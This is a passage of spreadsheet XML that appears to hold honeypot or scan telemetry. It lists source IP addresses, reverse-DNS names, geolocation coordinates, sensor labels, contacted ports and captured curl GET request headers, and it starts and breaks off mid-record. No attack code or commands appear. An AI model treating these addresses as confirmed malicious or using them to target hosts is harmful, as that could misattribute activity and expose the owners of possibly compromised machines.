    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.209.6:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:daa1:6147</t>
  </si>
  <si>
    <t>f8e719814d383a3846a0fe6ed21eb67b</t>
  </si>
  <si>
    <t>222.116.180.50</t>
  </si>
  <si>
    <t>Cheongju-si (Ochang-eup)</t>
  </si>
  <si>
    <t>36.7337</t>
  </si>
  <si>
    <t>127.422</t>
  </si>
  <si>
    <t>::ffff:de74:b432</t>
  </si>
  <si>
    <t>a0e797be6992007b5cbe4d891f83f622</t>
  </si>
  <si>
    <t>59.126.176.150</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-126-176-150.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_HTTP_H2&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;9100&amp;&amp;8024</t>
  </si>
  <si>
    <t>::ffff:3b7e:b096</t>
  </si>
  <si>
    <t>e2191c412d1e1d1a2552d9b725c5ee97</t>
  </si>
  <si>
    <t>138.199.34.145</t>
  </si>
  <si>
    <t>Bratislava</t>
  </si>
  <si>
    <t>3060972</t>
  </si>
  <si>
    <t>810 00</t>
  </si>
  <si>
    <t>48.1486</t>
  </si>
  <si>
    <t>17.1077</t>
  </si>
  <si>
    <t>Cdnext BRA</t>
  </si>
  <si>
    <t>::ffff:8ac7:2291</t>
  </si>
  <si>
    <t>5e0b90f91764330747d87c6c8990a9e6</t>
  </si>
  <si>
    <t>1.34.58.99</t>
  </si>
  <si>
    <t>1-34-58-99.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_LDAP_H42&amp;&amp;SMA-LAB_MT-CPA_H23&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_MT-CPA_H46&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H8</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;389&amp;&amp;17841&amp;&amp;23&amp;&amp;18940&amp;&amp;36706&amp;&amp;NA&amp;&amp;9100&amp;&amp;41991&amp;&amp;41998</t>
  </si>
  <si>
    <t>::ffff:122:3a63</t>
  </si>
  <si>
    <t>42c139ec436a32be57420a3d34f31fdf</t>
  </si>
  <si>
    <t>114.33.107.149</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-33-107-149.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H45&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H20&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H38</t>
  </si>
  <si>
    <t>22972&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7221:6b95</t>
  </si>
  <si>
    <t>8f40f49fc53e4eec782009639d6eb892</t>
  </si>
  <si>
    <t>114.35.199.237</t>
  </si>
  <si>
    <t>NA&amp;&amp;114-35-199-237.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H34</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '94.131.113.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}</t>
  </si>
  <si>
    <t>::ffff:7223:c7ed</t>
  </si>
  <si>
    <t>a32d5fb6bb6c9f6eb6b1a5a0577e6b50</t>
  </si>
  <si>
    <t>187.53.184.108</t>
  </si>
  <si>
    <t>TO</t>
  </si>
  <si>
    <t>Tocantins</t>
  </si>
  <si>
    <t>Palmas</t>
  </si>
  <si>
    <t>3474574</t>
  </si>
  <si>
    <t>-10.1674</t>
  </si>
  <si>
    <t>-48.3277</t>
  </si>
  <si>
    <t>AS8167</t>
  </si>
  <si>
    <t>::ffff:bb35:b86c</t>
  </si>
  <si>
    <t>060f15ab198d373547cef7bf5ce6d0a0</t>
  </si>
  <si>
    <t>114.33.107.213</t>
  </si>
  <si>
    <t>114-33-107-213.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H7&amp;&amp;SMA-LAB_DNS_H15&amp;&amp;SMA-LAB_MT-CPA_H34&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H24</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;2888&amp;&amp;23&amp;&amp;9100&amp;&amp;56444&amp;&amp;56457&amp;&amp;56467&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.171.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:7221:6bd5</t>
  </si>
  <si>
    <t>e09d271fd12f3c610a6b980e5e16c45e</t>
  </si>
  <si>
    <t>59.127.155.16</t>
  </si>
  <si>
    <t>NA&amp;&amp;59-127-155-16.hinet-ip.hinet.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H9&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_MT-CPA_H30&amp;&amp;SMA-LAB_MT-CPA_H43&amp;&amp;SMA-LAB_HTTP_H4&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H11</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;50959&amp;&amp;17056&amp;&amp;9100&amp;&amp;54952</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.74.222.213:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '144.126.148.5:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '103.113.68.70:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '66.94.127.183:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '109.123.229.33:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7f:9b10</t>
  </si>
  <si>
    <t>db4bc446c127127c42055d0557222fb8</t>
  </si>
  <si>
    <t>59.178.11.131</t>
  </si>
  <si>
    <t>::ffff:3bb2:b83</t>
  </si>
  <si>
    <t>fc35159453d65171fc8c503a8fc2b78c</t>
  </si>
  <si>
    <t>59.126.68.151</t>
  </si>
  <si>
    <t>59-126-68-151.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H17&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_DNS_H1&amp;&amp;SMA-LAB_MT-CPA_H39&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H16&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H5</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;53&amp;&amp;11403&amp;&amp;23</t>
  </si>
  <si>
    <t>::ffff:3b7e:4497</t>
  </si>
  <si>
    <t>806cbd398591a69f00c07b359ad98e2a</t>
  </si>
  <si>
    <t>59.126.160.80</t>
  </si>
  <si>
    <t>59-126-160-80.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_SSH_H21&amp;&amp;SMA-LAB_MT-CPA_H24&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_HTTP_H8&amp;&amp;SMA-LAB_HTTP_H10&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;23&amp;&amp;22&amp;&amp;4435</t>
  </si>
  <si>
    <t>::ffff:3b7e:a050</t>
  </si>
  <si>
    <t>e2068fe140d886f61c5a500c97c8111b</t>
  </si>
  <si>
    <t>59.178.155.132</t>
  </si>
  <si>
    <t>::ffff:3bb2:9b84</t>
  </si>
  <si>
    <t>272380023e08f96f726588c18abb2803</t>
  </si>
  <si>
    <t>59.178.2.204</t>
  </si>
  <si>
    <t>::ffff:3bb2:2cc</t>
  </si>
  <si>
    <t>08f72e1e1c7bd157f7ab94b62eac4dbd</t>
  </si>
  <si>
    <t>218.161.78.231</t>
  </si>
  <si>
    <t>218-161-78-231.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H13</t>
  </si>
  <si>
    <t>23&amp;&amp;50972&amp;&amp;51009&amp;&amp;51041&amp;&amp;51054&amp;&amp;11984&amp;&amp;50958&amp;&amp;50994&amp;&amp;51028&amp;&amp;56242&amp;&amp;80</t>
  </si>
  <si>
    <t>::ffff:daa1:4ee7</t>
  </si>
  <si>
    <t>dda9a2ec40026eed54cd62f37ac356fa</t>
  </si>
  <si>
    <t>59.126.72.231</t>
  </si>
  <si>
    <t>59-126-72-231.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H3&amp;&amp;SMA-LAB_HTTP_H11&amp;&amp;SMA-LAB_MT-CPA_H22&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_HTTP_H16&amp;&amp;SMA-LAB_TELNET_H19&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_MT-CPA_H17&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H27</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;28633&amp;&amp;23&amp;&amp;20573&amp;&amp;33286&amp;&amp;33296&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.233.76.135:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '194.4.48.242:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.54.117.64:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '185.250.150.39:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:3b7e:48e7</t>
  </si>
  <si>
    <t>ef4ac30e9b5b8d6f580bd5471f3af5a0</t>
  </si>
  <si>
    <t>122.116.142.53</t>
  </si>
  <si>
    <t>122-116-142-53.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTPS_H3&amp;&amp;SMA-LAB_VNC_H18&amp;&amp;SMA-LAB_SOCKS5_H33&amp;&amp;SMA-LAB_HTTP_H22&amp;&amp;SMA-LAB_LDAP_H1&amp;&amp;SMA-LAB_SSH_H17&amp;&amp;SMA-LAB_SMB_H9&amp;&amp;SMA-LAB_IPP_H39&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_HTTP_H39&amp;&amp;SMA-LAB_HTTP_H13&amp;&amp;SMA-LAB_MT-CPA_H44&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_H3&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H15&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H25&amp;&amp;SMA-LAB_HTTP_H18&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H28&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H47</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;443&amp;&amp;5900&amp;&amp;1080&amp;&amp;80&amp;&amp;389&amp;&amp;22&amp;&amp;445&amp;&amp;631&amp;&amp;9875&amp;&amp;14029&amp;&amp;42810&amp;&amp;23&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:7a74:8e35</t>
  </si>
  <si>
    <t>b48563e41ba7617bc375a95ec0ab3612</t>
  </si>
  <si>
    <t>117.241.210.6</t>
  </si>
  <si>
    <t>::ffff:75f1:d206</t>
  </si>
  <si>
    <t>89af3be11d0c49e81e605f3d500981f8</t>
  </si>
  <si>
    <t>179.25.82.45</t>
  </si>
  <si>
    <t>r179-25-82-45.dialup.adsl.anteldata.net.uy</t>
  </si>
  <si>
    <t>Paso Carrasco</t>
  </si>
  <si>
    <t>Paso de Carrasco</t>
  </si>
  <si>
    <t>3441292</t>
  </si>
  <si>
    <t>-34.8603</t>
  </si>
  <si>
    <t>-56.0522</t>
  </si>
  <si>
    <t>::ffff:b319:522d</t>
  </si>
  <si>
    <t>681413767403af159cdf08f1350111ec</t>
  </si>
  <si>
    <t>117.199.14.214</t>
  </si>
  <si>
    <t>::ffff:75c7:ed6</t>
  </si>
  <si>
    <t>6b3f7cfe04f80b2aa0ed23369d4d6ac2</t>
  </si>
  <si>
    <t>218.161.28.27</t>
  </si>
  <si>
    <t>218-161-28-27.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H34&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_HTTP_H12&amp;&amp;SMA-LAB_TELNET_H22&amp;&amp;SMA-LAB_TELNET_H14&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H5&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_MT-CPA_H7&amp;&amp;SMA-LAB_TELNET_H21&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H12&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H31&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H19</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;22&amp;&amp;23&amp;&amp;80&amp;&amp;55655&amp;&amp;16686&amp;&amp;NA&amp;&amp;10586&amp;&amp;34394&amp;&amp;25866&amp;&amp;9100</t>
  </si>
  <si>
    <t>::ffff:daa1:1c1b</t>
  </si>
  <si>
    <t>faef99b06c0a4358078c2ede2e3aeb67</t>
  </si>
  <si>
    <t>114.32.231.45</t>
  </si>
  <si>
    <t>114-32-231-45.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_SSH_H9&amp;&amp;SMA-LAB_MT-CPA_H38&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H2&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H32&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H30&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SM